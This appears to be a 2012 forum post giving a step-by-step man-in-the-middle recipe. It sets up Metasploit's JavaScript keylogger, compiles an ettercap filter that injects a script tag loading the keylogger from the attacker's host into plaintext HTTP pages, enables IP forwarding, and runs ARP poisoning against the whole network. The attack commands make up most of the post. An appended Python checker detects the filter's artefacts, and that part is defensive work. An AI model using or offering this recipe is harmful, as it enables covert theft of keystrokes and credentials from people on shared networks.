Diggs Posted February 6, 2012

Ach, now it's been moved to the unstable branch.
Diggs Posted April 4, 2012

I've spent a bit of time working on the Middler issues for a while and haven't gotten to the bottom of them. The Python parsing is both slow and mildly buggy, and the results just haven't shown up for a standalone application which can accomplish what I was hoping for. In the meantime, I found that the Metasploit http_javascript_keylogger has been added back to the stable branch. Combined with some good ettercap filters, you can append either the Java modules or the keylogger script, and it's much, much faster.

First, we need to generate the JavaScript keylogger and set up a handler in Metasploit for it. This is under:

    use auxiliary/server/capture/http_javascript_keylogger

For some more details on using the module, look here: https://community.rapid7.com/community/metasploit/blog/2012/02/21/metasploit-javascript-keylogger

Setting this up properly will set up the JavaScript in a random folder under /var/www and create a handler for the returned characters.

The next step is to insert it into the stream. The ettercap filter I have been playing with looks like this:

    # Requests to port 80: rename Accept-Encoding so the server answers uncompressed
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Accept-Nothing!");
        }
    }
    # Responses from port 80: splice the script tag in right after the closing head tag
    if (ip.proto == TCP && tcp.src == 80) {
        if (search(DATA.data, "</head>")) {
            replace("</head>", "</head><script src=\"http://192.168.0.2/qZBRDzd/test.js\"></script> ");
        }
        if (search(DATA.data, "</HEAD>")) {
            replace("</HEAD>", "</HEAD><script src=\"http://192.168.0.2/qZBRDzd/test.js\"></script> ");
        }
    }

The qZBRDzd/test.js is the file which is created from the Metasploit module. This can be compiled with etterfilter:

    etterfilter jsEmbed.filter -o jsEmbed.ef

So, we've got a filter that will insert the JavaScript src right after the head of a document. We now need to run ettercap and MITM the network.
You will need to set up ip_forwarding:

    echo 1 > /proc/sys/net/ipv4/ip_forward

And make sure ettercap is set up in etter.conf to handle iptables. Look that part up if you are new to it. Now run ettercap:

    ettercap -T -q -F jsEmbed.ef -M ARP // //

With this setup, I've found what I originally wanted in the Middler and also used a couple of well-known and stable products instead of a one-off demo for a con. If there are any fun ideas or improvements, let me know.
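Added detection example, not part of the original post and not code from the ettercap or Metasploit projects: a small Python checker that looks for the two artefacts the filter above leaves in plaintext HTTP, the Accept-Encoding request header renamed to "Accept-Nothing!" and a cross-origin script tag spliced in directly after the closing head tag of the response. The sample request, response bodies, host name and script URL are constructed for the example, and the check matches any case of the head tag, so it is broader than the filter itself.

```python
import re
from typing import List, Optional
from urllib.parse import urlparse

# Constructed sample traffic (not captured from a real network). TAMPERED_REQUEST is
# what the filter's first branch produces; INJECTED_BODY is what its second branch
# produces, with a placeholder script host instead of the post's address.
TAMPERED_REQUEST = "GET / HTTP/1.1\r\nHost: www.example.com\r\nAccept-Nothing!: gzip, deflate\r\n\r\n"
CLEAN_REQUEST = "GET / HTTP/1.1\r\nHost: www.example.com\r\nAccept-Encoding: gzip, deflate\r\n\r\n"
INJECTED_BODY = (
    "<html><head><title>t</title></head>"
    '<script src="http://192.0.2.10/placeholder/test.js"></script> <body>hi</body></html>'
)
CLEAN_BODY = "<html><head><title>t</title></head><body>hi</body></html>"

# A <script src=...> immediately following </head> (any case, optional whitespace).
_HEAD_INJECT = re.compile(r'</head>\s*<script[^>]*\ssrc=["\']?([^"\'\s>]+)', re.IGNORECASE)


def request_host(request: str) -> Optional[str]:
    """Return the lowercased Host header of a raw HTTP/1.1 request, if present."""
    for line in request.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "host":
            return value.strip().lower()
    return None


def header_tampering(request: str) -> List[str]:
    """Flag the non-standard header name the filter substitutes for Accept-Encoding."""
    findings = []
    for line in request.split("\r\n")[1:]:
        if line.partition(":")[0].strip().lower() == "accept-nothing!":
            findings.append("Accept-Encoding rewritten to Accept-Nothing! (in-path header tampering)")
    return findings


def injected_scripts(host: str, body: str) -> List[str]:
    """Flag scripts spliced right after </head> whose host differs from the page's Host."""
    findings = []
    for match in _HEAD_INJECT.finditer(body):
        src = match.group(1)
        src_host = urlparse(src).hostname
        if src_host and src_host.lower() != host:
            findings.append(f"cross-origin script spliced after </head>: {src}")
    return findings


def scan(request: str, body: str) -> List[str]:
    """Run both checks over one request/response pair and return all findings."""
    return header_tampering(request) + injected_scripts(request_host(request) or "", body)
```

Both rewrites depend on the session being plaintext HTTP, so the same check finds nothing on TLS traffic and sites served only over HTTPS are not exposed to this filter.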